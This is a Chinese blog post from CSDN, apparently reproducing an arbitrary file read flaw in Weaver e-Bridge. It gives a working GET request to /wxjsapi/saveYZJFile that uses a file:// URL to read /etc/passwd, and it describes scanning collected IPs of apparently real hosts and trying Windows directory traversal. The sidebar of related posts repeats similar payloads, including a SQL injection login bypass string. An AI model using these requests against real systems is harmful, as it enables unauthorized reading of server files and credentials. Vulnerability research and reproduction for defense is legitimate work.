泛微云桥任意文件读取漏洞复现[09/18]

最新推荐文章于 2024-03-27 09:27:06 发布
最新推荐文章于 2024-03-27 09:27:06 发布
阅读量1.3k 收藏 1
点赞数
分类专栏: 漏洞 安全 环境复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39811856/article/details/108666168
版权
安全 同时被 3 个专栏收录
33 篇文章 2 订阅
订阅专栏
漏洞
26 篇文章 2 订阅
订阅专栏
环境复现
19 篇文章 0 订阅
订阅专栏

1.老规矩,搜寻目标机器(xpath用起来确实很方便)

2.根据网上的POC试试:

GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt HTTP/1.1
User-Agent: curl/7.29.0
Host: xxxxx
Accept: */*

3.根据收集到的IP,手动是真滴麻烦,写个小脚本再筛选一遍:

发现这个好像有戏,没有/etc/passwd,并且还是双斜杠,合理猜测应该是安装在windows上的,尝试目录遍历

再访问该文件(这里不是读文件名,而是访问文件id):

影响版本:

ATOM_123
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
E-Office(微OA)前台任意文件读取漏洞
The current road is different, love needs to distinguish between right and wrong
11-05 1146
微E-Office是一款企业级的全流程办公自动化软件,它包括协同办公、文档管理、知识管理、工作流管理等多个模块,涵盖了企业日常工作中的各个环节。在该产品前台登录页存在文件读取漏洞。officeserver.php文件存在任意文件读取漏洞,通过漏洞可以下载服务器上的任意文件。没有人规定,一朵花一定要成长为向日葵或者玫瑰。
漏洞微OA E-Cology ln.FileDownload文件读取漏洞
最新发布
晚风不及你
05-13 544
微OA E-Cology是一款面向中大型组织的数字化办公产品,它基于全新的设计理念和管理思想,旨在为中大型组织创建一个全新的高效协同办公环境。微OA E-Cology ln.FileDownload存在任意文件读取漏洞,允许未经授权的用户读取服务器上的敏感配置文件。Fofa-Query: app="微-OA(e-cology)"1.微OA E-Cology。2.漏洞POC详情见公众号文章。
全网最强:漏洞综合检测工具
bobo_patrick的博客
03-27 1124
全网poc最全、误报最少、漏洞利用方式最多的漏洞综合检测工具
漏洞-微OA xmlrpcServlet接口任意文件读取漏洞(附漏洞检测脚本)
jjjj1029056414的博客
12-25 1349
漏洞-微OA xmlrpcServlet接口任意文件读取漏洞,附带自己写的poc脚本
微OA云 未授权任意文件读取
Azjj
10-06 1696
0x00 漏洞描述 微云(e-Bridge)是上海微公司在”互联网+”的背景下研发的一款用于接互联网开放资源与企业信息化系统的系统集成中间件。微云存在任意文件读取漏洞,攻击者成功利用该漏洞,可实任意文件读取,获取敏感信息。 0x01 影响版本 2018-2019 多个版本。 0x02 漏洞 第一步:/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt,在返回包有id字符串 第
2021-微OA V8 SQL注入漏洞
热门推荐
weixin_43227251的博客
04-13 1万+
微OA V8 SQL注入漏洞 漏洞描述 微OA V8 存在SQL注入漏洞,攻击者可以通过漏洞获取管理员权限和服务器权限 漏洞影响 微OA V8 FOFA app=“微-协同办公OA” 漏洞 在getdata.jsp中,直接将request对象交给 weaver.hrm.common.AjaxManager.getData(HttpServletRequest, ServletContext) : 方法处理 在getData方法中,判断请求里cmd参数是否为空,如果不为空,调用proc方法 P
微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245)
12-25
微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245),可以指定文件路径进行读取,并提供检测方案
微云 e-Bridge 任意文件读取.md
04-11
微云 e-Bridge 任意文件读取
Silentsoul04#vulnerability-paper-1#微OA9前台任意文件上传1
07-25
微OA9前台任意文件上传漏洞位于: /page/exportImport/uploadOperation.jsp文件中Jsp流程大概是:判断请求是否是mult
微E-Office10远程代码执行漏洞
05-06
微E-Office 10确实存在远程代码执行漏洞,这个漏洞**可能导致严重的安全后果**。 该漏洞的关键在于系统处理上传的PHAR文件时存在的缺陷。攻击者能够上传伪装的PHAR文件到服务器,利用PHP处理PHAR文件时自动进行的...
E-office OA 任意文件下载漏洞
afei001
01-09 1390
目录 1.漏洞概述 2.影响范围 3.漏洞等级 4.漏洞 5.漏洞分析 6.漏洞 1.漏洞概述 微e-office是微公司面向中小型组织推出的OA产品,简单易用高效,部署快、投资少。提供免费试用体验。但微e-office OA系统存在的漏洞还真不少。这个任意文件下载漏洞之前在乌云上也爆出过了。由于配置文件/inc/attach.php中的ATTACHMENT_NAME参数未有效控制范围,导致任意文件下载。 ...
漏洞-微云 e-Bridge SQL注入(附漏洞检测脚本)
jjjj1029056414的博客
12-12 1258
漏洞-微云 e-Bridge SQL注入,附带自己写的poc脚本
记一次漏洞分析到发未公开新漏洞
weixin_42508548的博客
01-10 3566
本来想着分析分析微eoffice最新出的漏洞CNVD-2021-49104的,分析分析着,发代码好像有别的方法也存在..
微云任意文件读取漏洞[尽快升级]
weixin_46137328的博客
09-12 1181
0x00 微云来不及解释了,看图用的人很多。0X01 漏洞验证/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///e...
和信创天云桌面系统VENGD文件上传漏洞
afei001
04-25 452
目录 1.漏洞概述 2.漏洞分析 3.影响版本 4.漏洞等级 5.漏洞 5.1 FOFA实战 5.2 VESystem_VENGD_fileUpload_POC.py 5.3 VESystem_VENGD_fileUpload_EXP.py 5.漏洞 声明:以下脚本具有攻击性,请勿非法使用,否则后果自负。请勿进行非授权测试,否则后果自负。 1.漏洞概述 和信创天下一代云桌面系统融合了VDI、VOI、IDV三大架构优势的云桌面产品,实了前后端混合...
软件漏洞-微OA-汇总
weixin_30855099的博客
09-20 3252
SQL注入 前台SQL注入 用户名:admin' or password like 'c4ca4238a0b923820dcc509a6f75849b' and 'a'='a 密码: 1 验证页面参数 -loginid (1)/login/VerifyLogin.jsp?loginfile=%2Fwui%2Ftheme%2Fecology7%2Fpage%2Flogin.js...
[HW必备]|蓝队防守必须排查的57个安全漏洞与解决方案
03-18 5160
一、OA系统 二、E-mail 三、Web中间件 四、源代码管理 五、项目管理系统 六、开源运维监控 七、堡垒机
微 e-cology9 filedownload.jsp 任意文件读取
11-24
微 e-cology9 是一款企业级办公自动化软件,然而它的 filedownload.jsp 存在任意文件读取漏洞。攻击者可以通过构造恶意的请求,访问该漏洞读取系统中的任意文件,包括敏感信息如用户凭证、配置文件和数据库等数据。这种漏洞可能对企业的数据安全造成严重威胁,因此需要尽快得到修。 修这个漏洞的方法之一是及时升级软件版本,确保安装了最新的补丁程序。此外,也可以通过屏蔽 filedownload.jsp 文件或者限制其访问权限的方法来暂时防范该漏洞。另外,加强网络安全防护,限制外部访问和加密重要数据,也是保护系统安全的有效手段。同时,企业也应该加强对于软件漏洞的监测和应急处理能力,及时发和处理类似问题,减少潜在的安全隐患。 总的来说,微 e-cology9 的 filedownload.jsp 任意文件读取漏洞可能对企业的数据和信息安全造成严重威胁,需要引起重视并及时采取措施加以修和预防。企业需要全面加强系统的安全防护能力,加强漏洞管理和修工作,以确保企业信息系统的安全稳定。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ATOM_123

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值